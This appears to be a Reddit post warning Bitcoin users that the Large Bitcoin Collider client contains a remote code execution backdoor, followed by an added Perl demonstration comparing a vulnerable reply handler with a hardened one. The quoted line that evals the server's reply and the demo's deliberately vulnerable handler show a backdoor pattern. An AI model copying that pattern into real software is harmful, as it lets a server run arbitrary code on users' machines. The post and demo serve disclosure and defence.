Do not run the Large Bitcoin Collider client, it’s probably malicious!

IT IS ACTUALLY MALICIOUS, DON'T RUN IT!

EDIT: I was originally going to retract that message, as the code seemed safe, but there's an actual backdoor allowing remote code execution! (see below).

You are probably assuming that I am one of the people who think that LBC significantly undermines the safety of Bitcoin. No, I am not. I just discovered something very weird when running the executable, which seems to suggest malicious behavior.

When I ran the original script after reading the documentation, it kept returning an error from the server and didn't run.

    sopa@pc:~/LBC $ ./LBC
    Will use 2 CPUs.
    Ask for work...
    Server doesn't like us. Answer: wrong secret.

It told me that the secret was wrong so I edited the script to print it out and that's where the shady stuff starts.

    sopa@pc:~/LBC $ ./LBC-modified
    Will use 2 CPUs.
    Ask for work...
    Server doesn't like us. Answer: malformed request.

Huh, a malformed request now?! Let's run it again.

    sopa@pc:~/LBC $ ./LBC-modified
    Will use 2 CPUs.
    Ask for work...
    Server doesn't like us. Answer: challenge failed.

I ran it multiple times and the error message was always different; it seemed like the messages were randomly picked from a list.

I thought this was very strange, as the original script returned the same error all the time. Then I discovered these lines in the LBC script:

    local ( $/, *FILE );
    open FILE, $file;
    my $codeprint = md5_hex( <FILE> );
    close FILE;
    return $codeprint;
    }

Notice the code style of this Perl script. It seems like it was obfuscated (or just compacted so that it does not take a lot of disk space, which is not that bad).

What this piece of code does is take an MD5 hash of the entire file. It then proceeds to submit that hash to the server with every request. This seems to verify that the file wasn't tampered with. There's also a death_kiss routine which prints "DEATH KISS" and exits. I have no idea what it's for, though.

There are over six thousand lines in this script and nobody really knows what they actually do.

I request u/therico666 to explain the above and to publish the unobfuscated source code of the script.

Do not run the client executable on any important computers, it might contain a rootkit. Unless the author of the scripts explains the purpose of these functions, I don't recommend trusting it.

EDIT: corrected the username: rico666 -> therico666.

REMOTE CODE EXECUTION BACKDOOR

As noted by u/_jstanley, there's a line to evaluate the server's reply. Basically, this is remote code execution.

    if ( defined $answer->{eval} ) { eval $answer->{eval}; }

submitted by /u/SopaXorzTaker
Bitcoin
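The two fragments quoted in the post (the self-hash of the client file and the eval of the server's reply) reproduced side by side, as an added example that is not code from the LBC client or its author. It feeds a constructed malicious reply to a handler that mirrors the quoted eval line, then to a handler that refuses it. The JSON wire format and the field names "status" and "work" are assumptions made for the demo, not the real LBC protocol.

```perl
#!/usr/bin/perl
# Added example, not code from the LBC client. It reproduces the two
# patterns quoted in the post (a self-hash "codeprint" and an eval of a
# server-supplied field) against a constructed reply, and shows a reply
# handler that refuses the backdoor. The JSON wire format and the field
# names "status" and "work" are assumptions, not the real LBC protocol.
use strict;
use warnings;
use JSON::PP;                  # core module since Perl 5.14
use Digest::MD5 qw(md5_hex);

# Constructed malicious server reply. The payload only sets a package
# variable so the demo is harmless; a real server could run anything here.
my $wire = '{"status":"ok","work":"1000:2000",'
         . '"eval":"$::PWNED = qq{server code ran as uid $<};"}';

# Same idea as the script's codeprint: MD5 of the whole client file,
# sent with every request so the server can tell a modified client apart.
# MD5 is used only because that is what the LBC script does.
sub codeprint {
    my ($file) = @_;
    open my $fh, '<', $file or die "open $file: $!";
    local $/;                  # slurp mode: read the file in one go
    my $digest = md5_hex(<$fh>);
    close $fh;
    return $digest;
}

# The pattern from the LBC script: whatever string the server puts in
# {eval} is compiled and executed with the client's privileges.
sub handle_reply_vulnerable {
    my ($json) = @_;
    my $answer = decode_json($json);
    if (defined $answer->{eval}) { eval $answer->{eval}; }
    return $answer->{work};
}

# Hardened handler: only known keys, only the expected work-range syntax,
# and never a string eval on anything that came over the network.
my %ALLOWED = map { $_ => 1 } qw(status work);

sub handle_reply_safe {
    my ($json) = @_;
    my $answer = decode_json($json);
    for my $key (sort keys %$answer) {
        die "refusing reply: unexpected key '$key'\n" unless $ALLOWED{$key};
    }
    die "refusing reply: bad work range\n"
        unless defined $answer->{work} && $answer->{work} =~ /\A\d+:\d+\z/;
    return $answer->{work};
}

print "codeprint of this file: ", codeprint($0), "\n";

my $work = handle_reply_vulnerable($wire);
print "vulnerable client accepted work $work\n";
print "side effect of the server's eval: ", ($::PWNED // 'none'), "\n";

my $safe = eval { handle_reply_safe($wire) };
print defined $safe ? "safe client accepted work $safe\n"
                    : "safe client: $@";
```

Run it with `perl lbc_eval_demo.pl` (file name is arbitrary). The vulnerable handler accepts the work range and, as a side effect, the server's string has already executed in the client's process by the time the function returns; the hardened handler dies on the unexpected `eval` key before looking at anything else, which is the behaviour a client that talks to an untrusted server should have.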